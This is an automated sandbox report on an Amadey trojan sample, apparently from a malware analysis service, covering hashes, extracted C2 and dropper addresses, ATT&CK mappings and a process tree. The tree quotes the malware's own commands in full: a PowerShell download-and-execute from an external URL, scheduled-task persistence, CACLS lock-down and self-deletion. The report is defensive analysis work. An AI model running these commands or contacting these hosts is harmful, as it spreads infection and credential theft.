amadey | 3adf6815c254e63f4b20fba0e03e2bf89ad397c2c096ea20cc7a059e8374d5f8

Analysis

max time kernel
137s
max time network
139s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
24-11-2022 16:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a3ab76b17b04ccbaff41b72ed665bf28e6c5586a4f715e43b1100820acdfd819.exe
Size

244KB
MD5

c8f046db4ece8e5bc2654c7037267b96
SHA1

f21cca0c799bfcb3d9ee3e0b511188a10b0b1327
SHA256

a3ab76b17b04ccbaff41b72ed665bf28e6c5586a4f715e43b1100820acdfd819
SHA512

bcec736ef727605fbe5a3b26fdaf4d13902e3f59d6c7d54262cf11bc3e1bb6d16b280e96600cca83f1564310bc8ea25aee982f770db6a7c3aaea787648037231
SSDEEP

6144:OWzEq1LqpOlwKhQB98/HLnOMOvWtIC8EeSL3WnV:OWzE+upOxhQBq/HLOMfZWV

Score

10^/10

amadey persistence spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://www.tvculturaourofino.com.br/assets/js/config_20.ps1

Extracted

Family

amadey

Version

3.50

193.56.146.174/g84kvj4jck/index.php

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

48 3028 powershell.exe
49 3028 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 4 IoCs

Processes:

rovwer.exe3000.exefile.exerovwer.exe

pid process

4544 rovwer.exe
1512 3000.exe
1112 file.exe
4848 rovwer.exe

flow	pid	process
48	3028	powershell.exe
49	3028	powershell.exe

pid	process
4544	rovwer.exe
1512	3000.exe
1112	file.exe
4848	rovwer.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

a3ab76b17b04ccbaff41b72ed665bf28e6c5586a4f715e43b1100820acdfd819.exerovwer.exefile.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	a3ab76b17b04ccbaff41b72ed665bf28e6c5586a4f715e43b1100820acdfd819.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	rovwer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	file.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

rovwer.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\3000.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000212001\\3000.exe"	rovwer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\file.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000213001\\file.exe"	rovwer.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid	pid_target	process	target process
1340	4352	WerFault.exe	a3ab76b17b04ccbaff41b72ed665bf28e6c5586a4f715e43b1100820acdfd819.exe
344	4848	WerFault.exe	rovwer.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

4896 schtasks.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

4516 PING.EXE
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

3028 powershell.exe
3028 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 3028 powershell.exe

pid	process
4896	schtasks.exe

pid	process
4516	PING.EXE

pid	process
3028	powershell.exe
3028	powershell.exe

description	pid	process
Token: SeDebugPrivilege	3028	powershell.exe

Suspicious use of WriteProcessMemory 43 IoCs

Processes:

a3ab76b17b04ccbaff41b72ed665bf28e6c5586a4f715e43b1100820acdfd819.exerovwer.execmd.exefile.execmd.execmd.exe

description	pid	process	target process
PID 4352 wrote to memory of 4544	4352	a3ab76b17b04ccbaff41b72ed665bf28e6c5586a4f715e43b1100820acdfd819.exe	rovwer.exe
PID 4352 wrote to memory of 4544	4352	a3ab76b17b04ccbaff41b72ed665bf28e6c5586a4f715e43b1100820acdfd819.exe	rovwer.exe
PID 4352 wrote to memory of 4544	4352	a3ab76b17b04ccbaff41b72ed665bf28e6c5586a4f715e43b1100820acdfd819.exe	rovwer.exe
PID 4544 wrote to memory of 4896	4544	rovwer.exe	schtasks.exe
PID 4544 wrote to memory of 4896	4544	rovwer.exe	schtasks.exe
PID 4544 wrote to memory of 4896	4544	rovwer.exe	schtasks.exe
PID 4544 wrote to memory of 4560	4544	rovwer.exe	cmd.exe
PID 4544 wrote to memory of 4560	4544	rovwer.exe	cmd.exe
PID 4544 wrote to memory of 4560	4544	rovwer.exe	cmd.exe
PID 4560 wrote to memory of 2512	4560	cmd.exe	cmd.exe
PID 4560 wrote to memory of 2512	4560	cmd.exe	cmd.exe
PID 4560 wrote to memory of 2512	4560	cmd.exe	cmd.exe
PID 4560 wrote to memory of 3500	4560	cmd.exe	cacls.exe
PID 4560 wrote to memory of 3500	4560	cmd.exe	cacls.exe
PID 4560 wrote to memory of 3500	4560	cmd.exe	cacls.exe
PID 4560 wrote to memory of 2392	4560	cmd.exe	cacls.exe
PID 4560 wrote to memory of 2392	4560	cmd.exe	cacls.exe
PID 4560 wrote to memory of 2392	4560	cmd.exe	cacls.exe
PID 4560 wrote to memory of 688	4560	cmd.exe	cmd.exe
PID 4560 wrote to memory of 688	4560	cmd.exe	cmd.exe
PID 4560 wrote to memory of 688	4560	cmd.exe	cmd.exe
PID 4560 wrote to memory of 3564	4560	cmd.exe	cacls.exe
PID 4560 wrote to memory of 3564	4560	cmd.exe	cacls.exe
PID 4560 wrote to memory of 3564	4560	cmd.exe	cacls.exe
PID 4560 wrote to memory of 4932	4560	cmd.exe	cacls.exe
PID 4560 wrote to memory of 4932	4560	cmd.exe	cacls.exe
PID 4560 wrote to memory of 4932	4560	cmd.exe	cacls.exe
PID 4544 wrote to memory of 1512	4544	rovwer.exe	3000.exe
PID 4544 wrote to memory of 1512	4544	rovwer.exe	3000.exe
PID 4544 wrote to memory of 1512	4544	rovwer.exe	3000.exe
PID 4544 wrote to memory of 1112	4544	rovwer.exe	file.exe
PID 4544 wrote to memory of 1112	4544	rovwer.exe	file.exe
PID 4544 wrote to memory of 1112	4544	rovwer.exe	file.exe
PID 1112 wrote to memory of 4240	1112	file.exe	cmd.exe
PID 1112 wrote to memory of 4240	1112	file.exe	cmd.exe
PID 4240 wrote to memory of 3028	4240	cmd.exe	powershell.exe
PID 4240 wrote to memory of 3028	4240	cmd.exe	powershell.exe
PID 1112 wrote to memory of 1896	1112	file.exe	cmd.exe
PID 1112 wrote to memory of 1896	1112	file.exe	cmd.exe
PID 1112 wrote to memory of 1896	1112	file.exe	cmd.exe
PID 1896 wrote to memory of 4516	1896	cmd.exe	PING.EXE
PID 1896 wrote to memory of 4516	1896	cmd.exe	PING.EXE
PID 1896 wrote to memory of 4516	1896	cmd.exe	PING.EXE

C:\Users\Admin\AppData\Local\Temp\a3ab76b17b04ccbaff41b72ed665bf28e6c5586a4f715e43b1100820acdfd819.exe
"C:\Users\Admin\AppData\Local\Temp\a3ab76b17b04ccbaff41b72ed665bf28e6c5586a4f715e43b1100820acdfd819.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4352

C:\Users\Admin\AppData\Local\Temp\99e342142d\rovwer.exe
"C:\Users\Admin\AppData\Local\Temp\99e342142d\rovwer.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4544

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rovwer.exe /TR "C:\Users\Admin\AppData\Local\Temp\99e342142d\rovwer.exe" /F
3⤵
- Creates scheduled task(s)
PID:4896

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "rovwer.exe" /P "Admin:N"&&CACLS "rovwer.exe" /P "Admin:R" /E&&echo Y|CACLS "..\99e342142d" /P "Admin:N"&&CACLS "..\99e342142d" /P "Admin:R" /E&&Exit
3⤵
- Suspicious use of WriteProcessMemory
PID:4560

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4⤵
PID:2512

C:\Windows\SysWOW64\cacls.exe
CACLS "rovwer.exe" /P "Admin:N"
4⤵
PID:3500

C:\Windows\SysWOW64\cacls.exe
CACLS "rovwer.exe" /P "Admin:R" /E
4⤵
PID:2392

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4⤵
PID:688

C:\Windows\SysWOW64\cacls.exe
CACLS "..\99e342142d" /P "Admin:N"
4⤵
PID:3564

C:\Windows\SysWOW64\cacls.exe
CACLS "..\99e342142d" /P "Admin:R" /E
4⤵
PID:4932

C:\Users\Admin\AppData\Local\Temp\1000212001\3000.exe
"C:\Users\Admin\AppData\Local\Temp\1000212001\3000.exe"
3⤵
- Executes dropped EXE
PID:1512

C:\Users\Admin\AppData\Local\Temp\1000213001\file.exe
"C:\Users\Admin\AppData\Local\Temp\1000213001\file.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1112

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.tvculturaourofino.com.br/assets/js/config_20.ps1')"
4⤵
- Suspicious use of WriteProcessMemory
PID:4240

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.tvculturaourofino.com.br/assets/js/config_20.ps1')
5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3028

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\1000213001\file.exe" >> NUL
4⤵
- Suspicious use of WriteProcessMemory
PID:1896

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
5⤵
- Runs ping.exe
PID:4516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4352 -s 904
2⤵
- Program crash
PID:1340

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4352 -ip 4352
1⤵
PID:3088

C:\Users\Admin\AppData\Local\Temp\99e342142d\rovwer.exe
C:\Users\Admin\AppData\Local\Temp\99e342142d\rovwer.exe
1⤵
- Executes dropped EXE
PID:4848

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4848 -s 424
2⤵
- Program crash
PID:344

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4848 -ip 4848
1⤵
PID:732

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5080DC7A65DB6A5960ECD874088F3328_862BA1770B2FEE013603D2FF9ABEAFDA
Filesize
2KB

MD5
a00df46a47444b9f0c07a8aa108451e5

SHA1
78431ace34654656da1081628f260813e05fa3c5

SHA256
985872da234d081b3787a0f7bdf155dd5235ca2b1ed066ada683e528982b7291

SHA512
bdaa0115f93427bb4d053eeea2a22d5cf80d7b24d4a33070ff251510c8325d2620486210a1aecf76d9805f97902ed333f73360aa23bb197acfca2b1d74c2135f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_2DBE917624E9880FE0C7C5570D56E691
Filesize
1KB

MD5
6ecce5cfdd4846330c341ae8675deda5

SHA1
f16a1e887e90a86f18a23926e28d0ff40fe00b70

SHA256
1185d9916e084a632219cf5f5cd2b93d5c443cc8eed7b0316fe0136c77d2e43b

SHA512
c42a045385c7302198d140638e9a19483a5ae146c197ba0274e37b46735619d5412f0a8745acc565857458d67c5a99a78fdf9790951eb78fb3cbcc2cd059006e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5080DC7A65DB6A5960ECD874088F3328_862BA1770B2FEE013603D2FF9ABEAFDA
Filesize
482B

MD5
bc37dae52ed9d24bc8503be24cf1da4e

SHA1
2c1b55b29b6f5aa607b37ce1e7659598d70e55cb

SHA256
90763464e3ba185a825e3f8173da4a8cf64c1649c6e105d7b47af47ba0a47b44

SHA512
2ee0bbe3e52fbfe5c9356f21cbe79f7fda4e9067eb24f4e4eeda53db9fc8bfe0b1d8f04e05f3a44984c879a39add3eb51a254367764ccdbf1529063c02b1fa1f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_2DBE917624E9880FE0C7C5570D56E691
Filesize
486B

MD5
29f337d2cc1b16de7a516f795e701545

SHA1
b7541fe7053149d152e5dfe511eadc0f5555f3de

SHA256
37832569347e3e8bcf9e9177c40e6383848754bcd189bef8b7518b9168bcdf68

SHA512
600df1f85565607c45c32a7189bbc6ae09c60d4e33852528968ce87c01955faa8906b7272c0c470660f27d58b11a7746b5ce48531b6e3aecec453fd64af42b1e

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000212001\3000.exe
Filesize
2.4MB

MD5
77181eb9385b899f4bce3387a2efe18c

SHA1
68488c2d2aae96c6f552bcddb81e198b0390312a

SHA256
e18597f8343d2752ecfea69c4615ea58f37d948ee5d0741791410fb2a4827b1b

SHA512
3d034f0b238ad5da850d38f3f247693415ca1773aab84f25c32d500864d7a11b8385d2c5da45a19950c5cdad9664963af85ae13d48da7fceee895d847f94eeb9

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000213001\file.exe
Filesize
121KB

MD5
95dbf9c73797b1b7c2630c3787f1176f

SHA1
3ff7a9c84709359a51f0ab399ca9c80ef39b158e

SHA256
17327944471d08fa9ff485acec01223dd98713f32670dbd99a24e04e1be57c36

SHA512
24c787a8b537590b2160b740fed9695c0e02f2aacf27d93e47f77da54d2a69859778eb37ab8c5782d3a9078d4e8e1ad28bfddf1603f3b73cefc95bc39d82374b

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000213001\file.exe
Filesize
121KB

MD5
95dbf9c73797b1b7c2630c3787f1176f

SHA1
3ff7a9c84709359a51f0ab399ca9c80ef39b158e

SHA256
17327944471d08fa9ff485acec01223dd98713f32670dbd99a24e04e1be57c36

SHA512
24c787a8b537590b2160b740fed9695c0e02f2aacf27d93e47f77da54d2a69859778eb37ab8c5782d3a9078d4e8e1ad28bfddf1603f3b73cefc95bc39d82374b

Download Submit
C:\Users\Admin\AppData\Local\Temp\99e342142d\rovwer.exe
Filesize
244KB

MD5
c8f046db4ece8e5bc2654c7037267b96

SHA1
f21cca0c799bfcb3d9ee3e0b511188a10b0b1327

SHA256
a3ab76b17b04ccbaff41b72ed665bf28e6c5586a4f715e43b1100820acdfd819

SHA512
bcec736ef727605fbe5a3b26fdaf4d13902e3f59d6c7d54262cf11bc3e1bb6d16b280e96600cca83f1564310bc8ea25aee982f770db6a7c3aaea787648037231

Download Submit
C:\Users\Admin\AppData\Local\Temp\99e342142d\rovwer.exe
Filesize
244KB

MD5
c8f046db4ece8e5bc2654c7037267b96

SHA1
f21cca0c799bfcb3d9ee3e0b511188a10b0b1327

SHA256
a3ab76b17b04ccbaff41b72ed665bf28e6c5586a4f715e43b1100820acdfd819

SHA512
bcec736ef727605fbe5a3b26fdaf4d13902e3f59d6c7d54262cf11bc3e1bb6d16b280e96600cca83f1564310bc8ea25aee982f770db6a7c3aaea787648037231

Download Submit
C:\Users\Admin\AppData\Local\Temp\99e342142d\rovwer.exe
Filesize
244KB

MD5
c8f046db4ece8e5bc2654c7037267b96

SHA1
f21cca0c799bfcb3d9ee3e0b511188a10b0b1327

SHA256
a3ab76b17b04ccbaff41b72ed665bf28e6c5586a4f715e43b1100820acdfd819

SHA512
bcec736ef727605fbe5a3b26fdaf4d13902e3f59d6c7d54262cf11bc3e1bb6d16b280e96600cca83f1564310bc8ea25aee982f770db6a7c3aaea787648037231

Download Submit
memory/688-148-0x0000000000000000-mapping.dmp

Download
memory/1112-155-0x0000000000000000-mapping.dmp

Download
memory/1512-151-0x0000000000000000-mapping.dmp

Download
memory/1896-165-0x0000000000000000-mapping.dmp

Download
memory/2392-147-0x0000000000000000-mapping.dmp

Download
memory/2512-145-0x0000000000000000-mapping.dmp

Download
memory/3028-159-0x0000000000000000-mapping.dmp

Download
memory/3028-164-0x0000023C8BA50000-0x0000023C8BA72000-memory.dmp

Filesize
136KB

Download
memory/3028-166-0x00007FFC1CCC0000-0x00007FFC1D781000-memory.dmp

Filesize
10.8MB

Download
memory/3028-168-0x00007FFC1CCC0000-0x00007FFC1D781000-memory.dmp

Filesize
10.8MB

Download
memory/3500-146-0x0000000000000000-mapping.dmp

Download
memory/3564-149-0x0000000000000000-mapping.dmp

Download
memory/4240-158-0x0000000000000000-mapping.dmp

Download
memory/4352-135-0x00000000007DE000-0x00000000007FD000-memory.dmp

Filesize
124KB

Download
memory/4352-134-0x0000000000400000-0x000000000065B000-memory.dmp

Filesize
2.4MB

Download
memory/4352-132-0x00000000007DE000-0x00000000007FD000-memory.dmp

Filesize
124KB

Download
memory/4352-140-0x0000000000400000-0x000000000065B000-memory.dmp

Filesize
2.4MB

Download
memory/4352-136-0x00000000023A0000-0x00000000023DE000-memory.dmp

Filesize
248KB

Download
memory/4352-133-0x00000000023A0000-0x00000000023DE000-memory.dmp

Filesize
248KB

Download
memory/4516-167-0x0000000000000000-mapping.dmp

Download
memory/4544-142-0x0000000000400000-0x000000000065B000-memory.dmp

Filesize
2.4MB

Download
memory/4544-154-0x0000000000400000-0x000000000065B000-memory.dmp

Filesize
2.4MB

Download
memory/4544-137-0x0000000000000000-mapping.dmp

Download
memory/4544-141-0x00000000009BC000-0x00000000009DB000-memory.dmp

Filesize
124KB

Download
memory/4544-153-0x00000000009BC000-0x00000000009DB000-memory.dmp

Filesize
124KB

Download
memory/4560-144-0x0000000000000000-mapping.dmp

Download
memory/4848-170-0x00000000009A0000-0x00000000009BF000-memory.dmp

Filesize
124KB

Download
memory/4848-171-0x0000000000400000-0x000000000065B000-memory.dmp

Filesize
2.4MB

Download
memory/4896-143-0x0000000000000000-mapping.dmp

Download
memory/4932-150-0x0000000000000000-mapping.dmp

Download